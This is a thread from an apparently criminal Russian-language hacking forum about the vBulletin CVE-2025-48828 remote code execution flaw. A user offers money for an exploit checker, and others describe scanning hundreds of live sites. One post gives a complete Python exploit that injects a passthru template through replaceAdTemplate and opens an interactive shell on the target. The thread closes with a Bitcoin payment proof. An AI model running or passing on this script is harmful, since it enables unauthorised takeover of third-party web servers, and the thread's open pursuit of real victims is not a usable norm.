• XSS.stack #1 – первый литературный журнал от юзеров форума

vBulletin - CVE-2025-48828

Отслеживать
cr4ka

cr4ka

CD-диск
Пользователь
Регистрация
06.05.2024
Сообщения
14
Реакции
6
Гарант сделки
4
Всем привет интересная штука появилась.
Ищу кого то кто хочет помочь написать чекер
оплата за скорость будит приемлемая, договоримся)
CVE-2025-48828
CVE-2025-48828
WriteUp
 
Сортировать по дате Сортировать по голосам
За 0 Против
cr.png


Скрипт я ему уже отправил в среду. Благодарность в виде "Спс!" получил. Так что можно закрывать 😁
 
За 0 Против
За 0 Против
Пожалуйста, обратите внимание, что пользователь заблокирован
За 0 Против
cr4ka сказал(а):
оплата за скорость будит приемлемая, договоримся)
get_com сказал(а):
Скрипт я ему уже отправил в среду. Благодарность в виде "Спс!" получил. Так что можно закрывать 😁
Уважаемые модеры, мне кажется, или за такое нужно банить?
 
За 0 Против
Been trying to find any vulnerable vbulletin site to test this out but this requires very specific requirements such as the site has to be running a php version of 8.1 and above, alone that limits a lot of targets to find, has anyone had any luck finding real targets with this vulnerability?
 
За 0 Против
За 1 Против
molotov477 сказал(а):
Been trying to find any vulnerable vbulletin site to test this out but this requires very specific requirements such as the site has to be running a php version of 8.1 and above, alone that limits a lot of targets to find, has anyone had any luck finding real targets with this vulnerability?
This issue arises from the misuse of the PHP Reflection API in the vBulletin API controller logic, combined with specific changes introduced in PHP 8.1 that allow protected (and even private) methods to be invoked, for example, via the ReflectionMethod::invoke() method.

You can visit this link for further reading:

Don't Call That "Protected" Method: Dissecting an N-Day vBulletin RCE | Karma(In)Security

This is the personal website of Egidio Romano, a very curious guy from Sicily, Italy. He's a computer security enthusiast, particularly addicted to webapp security.
karmainsecurity.com
 
За 0 Против
Gh0stByte сказал(а):
This issue arises from the misuse of the PHP Reflection API in the vBulletin API controller logic, combined with specific changes introduced in PHP 8.1 that allow protected (and even private) methods to be invoked, for example, via the ReflectionMethod::invoke() method.

You can visit this link for further reading:

Don't Call That "Protected" Method: Dissecting an N-Day vBulletin RCE | Karma(In)Security

This is the personal website of Egidio Romano, a very curious guy from Sicily, Italy. He's a computer security enthusiast, particularly addicted to webapp security.
karmainsecurity.com
Yeah, I read the writeup for the vulnerability, I was just saying that even though vbulletin is used widely but the specific requirements for this particular vulnerability to allow for RCE are rare to find, I mean so far I have tested against at least 200 something sites, none of them got me RCE so far. Found the vbulletin versions that were identified but php version was not up to date, where php was identified to be 8.1 and above, the vbulletin version did not match. Maybe someone else has had better luck in trying to exploit this.
 
За 0 Против
molotov477 сказал(а):
Yeah, I read the writeup for the vulnerability, I was just saying that even though vbulletin is used widely but the specific requirements for this particular vulnerability to allow for RCE are rare to find, I mean so far I have tested against at least 200 something sites, none of them got me RCE so far. Found the vbulletin versions that were identified but php version was not up to date, where php was identified to be 8.1 and above, the vbulletin version did not match. Maybe someone else has had better luck in trying to exploit this.
For clarity i was using the php script given in the write, have not tested the msf module or the python script you shared, will test and see if they get me any results.
 
За 0 Против
molotov477 сказал(а):
Yeah, I read the writeup for the vulnerability, I was just saying that even though vbulletin is used widely but the specific requirements for this particular vulnerability to allow for RCE are rare to find, I mean so far I have tested against at least 200 something sites, none of them got me RCE so far. Found the vbulletin versions that were identified but php version was not up to date, where php was identified to be 8.1 and above, the vbulletin version did not match. Maybe someone else has had better luck in trying to exploit this.
Same for me, I ran about 100 or so and have not been able to get RCE on a single one. I see lots online about 100k+ vulnerable but I do not think this is the case at all, id say less than 5% will be vulnerable.
 
За 0 Против
Может кому пригодится.

Без правильного styleid шаблон просто не применится, и RCE не сработает.
Этот скрипт сам определяет нужный styleid и запускает оболочку.

1748907648438.png

Python: 
import sys
import requests
import urllib3
import re

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

print("\n+---------------------------------------------------------------------+")
print("| vBulletin (replaceAdTemplate) RCE Exploit – Targeted Attack        |")
print("+---------------------------------------------------------------------+\n")

if len(sys.argv) != 2:
    print("Usage: python3 rce.py https://target.site/")
    sys.exit(1)

target = sys.argv[1].rstrip("/")
main_url = target
template_url = main_url + "/ajax/api/ad/replaceAdTemplate"
render_url = main_url + "/ajax/render/ad_rce"

sess = requests.Session()
sess.verify = False
sess.headers.update({"User-Agent": "Mozilla/5.0"})

def get_styleid():
    try:
        r = sess.get(main_url + "/forum", timeout=10)
        match = re.search(r'styleid=(\d+)', r.text, re.IGNORECASE)
        return match.group(1) if match else "1"
    except:
        return "1"

styleid = get_styleid()
print(f"[+] Using styleid: {styleid}")

payload = {
    "routestring": "ajax/api/ad/replaceAdTemplate",
    "styleid": styleid,
    "location": "rce",
    "template": '<vb:if condition=\'"passthru"($_POST["cmd"])\'></vb:if>'
}

resp = sess.post(template_url, data=payload)
if resp.text.strip() != "null":
    print("[-] Failed to inject template.")
    sys.exit(1)

print("[+] Template successfully injected. Entering shell (type 'exit' to quit).\n")

while True:
    try:
        cmd = input("vBulletin-shell# ").strip()
        if cmd == "exit":
            break

        data = {
            "routestring": "ajax/render/ad_rce",
            "cmd": cmd
        }

        r = sess.post(render_url, data=data)
        match = re.search(r'(.*?)\{"template":', r.text, re.DOTALL)
        if match:
            print(match.group(1).strip())
        else:
            print(r.text.strip())
    except KeyboardInterrupt:
        break
 
За 2 Против
barnaul сказал(а):
Ахаха, мышь ипаная

p1r0man сказал(а):
Уважаемые модеры, мне кажется, или за такое нужно банить?

Vinki Ziger14



Охренеть, просраться не успеешь тебя давай банить
Братку закинул за помощь, не надо нервничать.
Пацан сказал пацан сделал)
Пруф

Bitcoin transaction 720450064600d3d5fc0e04e0fd3b196cd44adf27191999374a9e78b2357cbb4c

Inspect Bitcoin transaction 720450064600d3d5fc0e04e0fd3b196cd44adf27191999374a9e78b2357cbb4c: check hash, date, and event details with Blockchair.
blockchair.com
 
За 0 Против
cr4ka сказал(а):

Vinki Ziger14



Охренеть, просраться не успеешь тебя давай банить
Братку закинул за помощь, не надо нервничать.
Пацан сказал пацан сделал)
Пруф

Bitcoin transaction 720450064600d3d5fc0e04e0fd3b196cd44adf27191999374a9e78b2357cbb4c

Inspect Bitcoin transaction 720450064600d3d5fc0e04e0fd3b196cd44adf27191999374a9e78b2357cbb4c: check hash, date, and event details with Blockchair.
blockchair.com
и раскрыл всем на обозрение кошель-BTC Братки)
 
За 0 Против
Maxat сказал(а):
и раскрыл всем на обозрение кошель-BTC Братки)
ну он у меня в подписи

Средства получил, претензий не имею.
 
За 0 Против
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх